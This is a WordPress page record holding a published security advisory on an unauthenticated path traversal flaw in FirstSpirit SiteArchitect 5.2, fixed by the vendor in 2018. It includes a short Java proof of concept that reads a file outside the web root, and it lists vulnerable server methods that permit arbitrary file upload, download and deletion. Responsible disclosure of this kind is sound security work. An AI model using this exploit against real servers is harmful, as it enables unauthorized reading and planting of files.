{"id":16544,"date":"2021-07-07T12:50:25","date_gmt":"2021-07-07T10:50:25","guid":{"rendered":"https:\/\/herolab-usd.formwandler.rocks\/security-advisories\/usd-2018-0006\/"},"modified":"2021-07-19T14:07:33","modified_gmt":"2021-07-19T12:07:33","slug":"usd-2018-0006","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2018-0006\/","title":{"rendered":"usd-2018-0006"},"content":{"rendered":"<p>[et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" hover_enabled=\"0\" sticky_enabled=\"0\"]<\/p>\n<h1 class=\"h-custom-headline usd-small-letters h2\"><span>usd-2018-0006 | FirstSpirit SiteArchitect\/5.2<\/span><\/h1>\n<p><span><\/span><br \/><strong>Advisory ID<\/strong><span>: usd-2018-0006<\/span><br \/><strong>CVE Number<\/strong><span>: N\/A<\/span><br \/><strong>Affected Product<\/strong><span>: FirstSpirit SiteArchitect<\/span><br \/><strong>Affected Version<\/strong><span>: 5.2<\/span><br \/><strong>Vulnerability Type<\/strong><span>: Path Traversal<\/span><br \/><strong>Security Risk<\/strong><span>: Critical<\/span><br \/><strong>Vendor URL<\/strong><span>: <\/span><a href=\"https:\/\/www.e-spirit.com\/de\/\" target=\"_blank\" rel=\"noopener\">https:\/\/www.e-spirit.com\/de\/<\/a><br \/><strong>Vendor Status<\/strong><span>: Fixed according to vendor in version 5.2.2109<\/span><\/p>\n<h3><\/h3>\n<h3>Description<\/h3>\n<p>The application is vulnerable to path traversal attacks. According to the proof of concept below an attacker is able to access any desired files which the web server has access to. This is possible without authentication. It is also possible to upload any file with any name to any location that the web server has access to.<\/p>\n<p>A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder by manipulating variables that reference files with \u201cdot-dot-slash (..\/)\u201d sequences and its variations or by using absolute file paths.<\/p>\n<p><span><\/span><\/p>\n<h3>Proof of Concept<\/h3>\n<p>Example case:<\/p>\n<p>ServerCaller caller = createCaller(\u201e\u201c, port, mode, (String) null);<br \/>caller.connect();<br \/>ManagerInvocationHandler error = new ManagerInvocationHandler(caller, \u201eModuleManager\u201c);<br \/>ServerModuleManager moduleManager = (ServerModuleManager)java.lang.reflect.Proxy.newProxyInstance(ConnectionManager.class.getClassLoader(), new Class[]{ServerModuleManager.class}, error);<\/p>\n<p>ResourceFileInfo test = new ResourceFileInfo(\u201e..\/..\/..\/..\/download.txt\u201c, 123, true);<br \/>InputStream in = moduleManager.getResourceFileContent(test);<br \/>FileOutputStream out = new FileOutputStream(\u201ec:\\\\pentest\\\\download.txt\u201c);<br \/>IOUtils.copy(in, out);<\/p>\n<p>ManagerCallSignature:<br \/>manager=ModuleManager<br \/>method=getResourceFileContent<br \/>params=[class de.espirit.firstspirit.server.module.ResourceFileInfo] =&gt; The path of the parameter ResourceFileInfo is vulnerable to Directory-Traversal.<br \/>Any file which the web-server has access to can be read or downloaded without any<br \/>authentication.<\/p>\n<p>ManagerCallSignature:<br \/>manager=ServerManager<br \/>method=uploadUpdateFile<br \/>params=[class java.io.InputStream, class java.lang.String]}<br \/>=&gt; It\u2019s possible to put any file with any name in any location that the web-server<br \/>has access to.<\/p>\n<p>ManagerCallSignature:<br \/>manager=de.espirit.firstspirit.manager.ExportManager<br \/>method=deleteExportFile<br \/>params=[interface de.espirit.firstspirit.access.export.ExportFile] =&gt; The filename of the parameter ExportFile is vulnerable to Directory-Traversal.<\/p>\n<p>ManagerCallSignature:<br \/>manager=de.espirit.firstspirit.manager.ExportManager<br \/>method=downloadExportFile<br \/>params=[interface de.espirit.firstspirit.access.export.ExportFile] =&gt; The filename of the parameter ExportFile is vulnerable to Directory-Traversal.<\/p>\n<p>ManagerCallSignature:<br \/>manager=de.espirit.firstspirit.manager.ExportManager<br \/>method=uploadExportFile<br \/>params=[class java.lang.String, class java.io.InputStream] =&gt; The filename of the to-be-uploaded file is vulnerable to Directory-Traversal.<br \/>It\u2019s possible to put any file with any name in any location that the web-server<br \/>has access to.<\/p>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" hover_enabled=\"0\" sticky_enabled=\"0\"]<\/p>\n<h3>Fix<\/h3>\n<p><span>User\u2019s input for paths should be filtered and sanitized carefully. It is also recommended to isolate the file system of the application e.g with chroot jailing.<\/span><\/p>\n<h3><\/h3>\n<h3>Timeline<\/h3>\n<ul>\n<li>2018-04-04 First contact request via info@e-spirit.com<\/li>\n<li>2018-04-24 Send vulnerabilities to vendor<\/li>\n<li>2018-05-15 Vendor releases a patch to fix the vulnerabilities<\/li>\n<\/ul>\n<h3><\/h3>\n<h3>Credits<\/h3>\n<p><span>This security vulnerability was found by Sebastian Puttkammer of usd AG.<\/span><\/p>\n<\/div>\n<\/div>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>usd-2018-0006 | FirstSpirit SiteArchitect\/5.2 Advisory ID: usd-2018-0006CVE Number: N\/AAffected Product: FirstSpirit SiteArchitectAffected Version: 5.2Vulnerability Type: Path TraversalSecurity Risk: CriticalVendor URL: https:\/\/www.e-spirit.com\/de\/Vendor Status: Fixed according to vendor in version 5.2.2109 Description The application is vulnerable to path traversal attacks. According to the proof of concept below an attacker is able to access any desired files which [&hellip;]<\/p>\n","protected":false},"author":96,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-16544","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16544","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/96"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=16544"}],"version-history":[{"count":0,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16544\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=16544"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}